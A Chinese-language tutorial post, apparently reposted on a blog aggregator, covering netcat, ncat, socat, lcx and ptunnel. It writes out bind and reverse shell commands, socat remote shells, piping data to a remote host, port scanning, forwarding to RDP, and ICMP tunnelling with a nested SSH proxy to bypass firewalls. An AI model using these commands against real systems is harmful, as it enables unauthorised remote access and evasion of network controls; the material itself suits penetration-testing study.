zoukankan      html  css  js  c++  java
  • 流量操控技术nc工具,icmp隧道篇(3)

    *****************

    netcat ---nc

    网络工具中的瑞士军刀

    侦听模式/传输模式

    telnet/获取banner信息

    传输文本信息

    传输文件/目录

    加密传输文件

    远程控制/木马

    加密所有流量

    流媒体服务器

    远程克隆硬件

    1.

    nc -vn   

    客户端时:-v:显示详细的输出内容

      -n:olny ip,不用域名解析

      -q 1:等待1s退出

    nc -vn 220.181.12.110 80  基本使用,连接邮件或网页

    2.

    文本信息传递:

    A:nc -l -p 4444 //a服务器开发一个端口,-l:打开一个端口 -p:指定端口

    B:nc -nv Aip 4444

    3.

    远程电子取证功能:  ls -l | nc -nv  ip 4444  //  管道|  把前面的输出作为后门的输入

    收集的信息保存本地:  nc -l -p 4444 > ps.txt //  > 重定向到本地ps.txt文件

    4.文件传输  

    A:nc -l -p 4444 > 1.mp4 // > 接收者  反过来也可以,正反向都可以

    B:nc -nv ip 4444 < 1.mp4 -q 1 

    tar -cvf -wenjian  //打包文件

    tar -xvf -         //解压

    5.端口扫描

    nc -nvz 1.1.1.1 1-65535  //-z 扫描模式,扫描io  默认tcp端口

    nc -nvzu 1.1.1.1 1-1024  //-u udp端口  

    6.远程控制

    正向

    A:nc -lp 4444 -c bash

    B:nc ip 4444

    反向

    A:nc -lp 4444

    B:nc ip 4444 -c bash

    注:windows 用户把bash改为cmd

    7.ncat

    A:ncat -c cmd --allow 192.168.23.153 -vnl 333 --ssl  //ssl加密  只允许1.1.1.1

    B:ncat -nv ip 333 --ssl

    8.man手册,查看帮助

    man nc

    nc -h

    *****************************

    SOCAT

    *****************************

    被称为nc++  双向数据流通道工具

    连接端口

    socat - tcp:1.1.1.1:80

    tcp是协议,连接网页

    连接后输入:get / http 1.1/  会得到数据库的返回包

    侦听端口

    socat - tcp4-listen:22

    socat -tcp-l:333

    远程shell

    socat tcp-l:23 exec:sh,pty,stderr

    客户端连接23端口

    端口转发

    socat tcp4-listen:22,fork tcp4:1.1.1.1:22

    远程执行命令

    服务器:socat - udp-l:2001

    客户端;echo "`ifconfig`" | socat - udp4-datagram:ip:2001

    udp任意内容发送

    二进制编辑器

    简单的web服务器

    *******************

    lcx工具

    *******************

    第一种用法:端口转发功能

    1.1.1.1: lcx -listen 1111 2222

    2.2.2.2: lcx -slave 1.1.1.1 1111 3.3.3.3 3389

    然后,其他机器访问1.1.1.1的2222端口,就相当于访问了3.3.3.3的3389端口。

    第二种用法:转发功能

    1.1.1.1: lcx -tran 2222 2.2.2.2 3389

    然后,访问1.1.1.1的2222端口,就相当于访问了2.2.2.2的3389端口。

    ********************

    ptunnle ping tunnel ICMP 隧道工具

    **********************

    -通过ICMP echo(ping requests)和reply(ping reply)实现隧道

    -适用与防火墙只允许ping出站流量的环境

    -支持多并发连接、性能优

    -支持身份验证

    -需要root权限

    -工作过程 Proxy、client、destination

    -支持抓包

    --windows:winpcap

    --linux:libpcap

    启动

    ptunnel -x 123456  //-x 是加密码验证

    客户端连接

    sudo ptunnel -p 隧道ip -lp 本机侦听端口 -da 目标资源ip -dp 80 -x 123456

    sudo ptunnel -p 192.168.33.135 -lp 7001 -da 192.168.33.130 -dp 80 -x 123456

    嵌套代理ssh隧道

    ssh -CNfg -D 7002 root@127.0.0.1 -p 7001

    缺点:存在拒绝服务漏洞

     

  • 相关阅读:
    tnsnames.ora和listener.ora文件中的几个概念转
    SAP权限概念与设置(转)
    SAP License:HANA在线日志被误删了怎么办?(转)
    SAP ERP to SAP Cloud Platform Integration via Webdispatcher
    DotSpatial 要素删除节点
    DotSpatial 节点编辑
    使新添加的.gitignore生效
    关于netcat(nc)开启监听有趣的发现
    Gluster FS故障修复
    Git去除SSL验证
  • 原文地址:https://www.cnblogs.com/trevain/p/13737291.html
Copyright © 2011-2022 走看看